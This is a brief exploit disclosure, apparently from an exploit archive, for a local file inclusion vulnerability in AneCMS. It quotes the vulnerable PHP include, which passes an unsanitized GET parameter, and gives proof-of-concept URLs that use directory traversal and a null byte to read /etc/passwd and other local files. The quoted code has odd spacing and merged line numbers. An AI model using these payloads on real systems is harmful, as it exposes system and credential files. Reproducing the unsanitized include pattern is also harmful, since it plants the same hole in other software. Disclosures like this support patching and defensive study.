# Exploit Title: AneCMS v.2e2c583 LFI exploit
# Date: 03.04.2012# Author: I2sec-PJH
# Software Link: https://github.com/AneGroup/AneCMS
# Version: v.2e2c583 -----------------------------------------------------
-Description vulnerabilities have been discovered in the index page.
-source of index.php
1. if (isset ($ _GET ['p']))2. include '. / pages /'. $ _GET ['p']. '. php';
-PoC
http://localhost/index.php?p=../../../../etc/passwd%00
http://localhost/index.php?p=../../../../[localfile]%00